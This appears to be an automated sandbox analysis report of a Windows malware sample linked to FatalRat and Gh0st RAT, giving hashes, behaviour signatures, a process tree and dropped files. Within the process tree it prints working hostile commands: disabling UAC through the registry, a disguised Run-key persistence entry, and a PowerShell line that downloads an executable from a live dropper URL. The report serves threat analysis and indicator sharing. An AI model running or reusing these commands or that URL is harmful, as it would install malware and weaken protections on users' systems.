Analysis

  • max time kernel: 143s
  • max time network: 151s
  • platform: windows7_x64
  • resource: win7-20240903-en
  • resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted: 03/03/2025, 10:02

General

  • Target: 2025-03-03_a69273e15f761f1aba60604ae7823581_hijackloader_ryuk.exe
  • Size: 20.2MB
  • MD5: a69273e15f761f1aba60604ae7823581
  • SHA1: f7a5fbb131ac38592208f534bb45d5927ef33bd1
  • SHA256: 361d4971fb5d11daf62336bbf8427a17c4e1b6c7b33db0c82037d34cc9ae07b8
  • SHA512: 84b4b62eca8d781d29bf21f519356460346d75a6998130ef88d23e69de6dea1a6d92df9dd2b2625261520ad3c5f8479c0d4637ce29900548e6e6bea2c8f15ede
  • SSDEEP: 196608:oatpgF2oM7Vk96Cy8xEqn0SweKG8PvMTnsOTLkE:9tpgF2oM7Vk96Cy8xEqn0MlAvYnsO3J

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    exe.dropper: https://baba-1336130708.cos.ap-tokyo.myqcloud.com/as.exe

Signatures

  • FatalRat

    FatalRat is a modular infostealer family written in C++, first seen in June 2021.

  • Fatalrat family
  • Gh0st RAT payload 2 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) whose source code is public; it has been used by multiple Chinese groups.

  • Gh0strat family
  • UAC bypass 3 TTPs 1 IoCs
  • Fatal Rat payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-03_a69273e15f761f1aba60604ae7823581_hijackloader_ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-03_a69273e15f761f1aba60604ae7823581_hijackloader_ryuk.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\Downloads\20250303030353\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:2384
    • C:\programdata\20250303030353\Agghosts.exe
      "C:\programdata\20250303030353\Agghosts.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:548
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
      2⤵
      • Adds Run key to start application
      PID:2932
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:2956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/as.exe', 'C:\Users\Public\Videos\bin.exe')"
        3⤵
        • Blocklisted process makes network request
        • Downloads MZ/PE file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2972

MITRE ATT&CK Enterprise v15

Downloads

    • C:\ProgramData\20250303030353\Agghosts.exe
      Filesize: 2.7MB
      MD5: 2a24dcd41bc3c5b5f7eceda525786578
      SHA1: 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
      SHA256: 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
      SHA512: aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

    • C:\ProgramData\lnk\2.lnk
      Filesize: 1KB
      MD5: 9fe82d16cb33ccdb33c50d5a0a7c1150
      SHA1: eb9e69ef2f48e92551237a951e63617c2e23f66c
      SHA256: fbc191719fa1cd0d4065a80b531569b80cb2e0a085da9a420734a22bcf74b1db
      SHA512: 429dafc2397b7758b7245e99d92157ad7d22b173bbcfa3744349b4e39dd97044824eb55ab88b23351a2916dbce68962f629e579391a8aa829e49a5e8d52635c6

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize: 71KB
      MD5: 83142242e97b8953c386f988aa694e4a
      SHA1: 833ed12fc15b356136dcdd27c61a50f59c5c7d50
      SHA256: d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
      SHA512: bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize: 344B
      MD5: 659e2cb4b435b9d4195ae961d5f7b407
      SHA1: 2346fc1ca0e3241181ad74eaff48ba661b380f76
      SHA256: 72d54d0cc039dff1d23187a41a12f026b9785bf5bddadef30bfe822d04536860
      SHA512: 1e66833a7cfadebe31250b837c348660916db19341c224444cac9e728a36e3decee8fa23dd42fa32905126394c6a4644a00f26faf79cbb576f488d05e7b6e6b9

    • C:\Users\Admin\AppData\Local\Temp\TarC39E.tmp
      Filesize: 183KB
      MD5: 109cab5505f5e065b63d01361467a83b
      SHA1: 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
      SHA256: ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
      SHA512: 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

    • C:\Users\Public\Downloads\20250303030353\1.bat
      Filesize: 229B
      MD5: fa42ebb1071abc0e618c296ea2cf71a6
      SHA1: 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
      SHA256: 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
      SHA512: 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

    • C:\Users\Public\Videos\download_and_run.bat
      Filesize: 400B
      MD5: 8e5375901bc48c86773c54b132c9f85c
      SHA1: c3aa392dbd79409726b80cfa54338d38882f162b
      SHA256: fcc588c2a5b9d2b1752f81e261c587dfea693ecdaf4b965bc2a83442afe5ffa0
      SHA512: 1759b769dcac37f4511d53b7f0b2f814238ffa927585f46c9230a0d142e20c1ba2e2de649c717dce85ce2b8cd8808aa6a4283ac1406933773dc4bde336db42e2

    • C:\programdata\20250303030353\Ensup.log
      Filesize: 192KB
      MD5: 2fd94f6e1d71454d716a126f0d7450ac
      SHA1: 5d966df95c741880089e9078af921a22216516ec
      SHA256: a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
      SHA512: 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

    • C:\programdata\20250303030353\libcef.dll
      Filesize: 1.9MB
      MD5: b7f8c3416cdfd6f46c790da064f66099
      SHA1: d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
      SHA256: b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
      SHA512: 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

    • memory/548-122-0x0000000003780000-0x00000000038CD000-memory.dmp
      Filesize: 1.3MB
    • memory/548-76-0x0000000000C90000-0x0000000000CB9000-memory.dmp
      Filesize: 164KB
    • memory/548-125-0x0000000003780000-0x00000000038CD000-memory.dmp
      Filesize: 1.3MB
    • memory/548-126-0x0000000003780000-0x00000000038CD000-memory.dmp
      Filesize: 1.3MB
    • memory/1936-93-0x0000000003E10000-0x0000000004224000-memory.dmp
      Filesize: 4.1MB
    • memory/1936-38-0x0000000003A00000-0x0000000003E10000-memory.dmp
      Filesize: 4.1MB
    • memory/1936-37-0x0000000003E10000-0x0000000004224000-memory.dmp
      Filesize: 4.1MB
    • memory/1936-94-0x0000000003A00000-0x0000000003E10000-memory.dmp
      Filesize: 4.1MB
    • memory/1936-40-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
      Filesize: 4KB
    • memory/1936-39-0x0000000003E10000-0x0000000004224000-memory.dmp
      Filesize: 4.1MB
    • memory/2972-100-0x000000001B610000-0x000000001B8F2000-memory.dmp
      Filesize: 2.9MB
    • memory/2972-101-0x0000000002720000-0x0000000002728000-memory.dmp
      Filesize: 32KB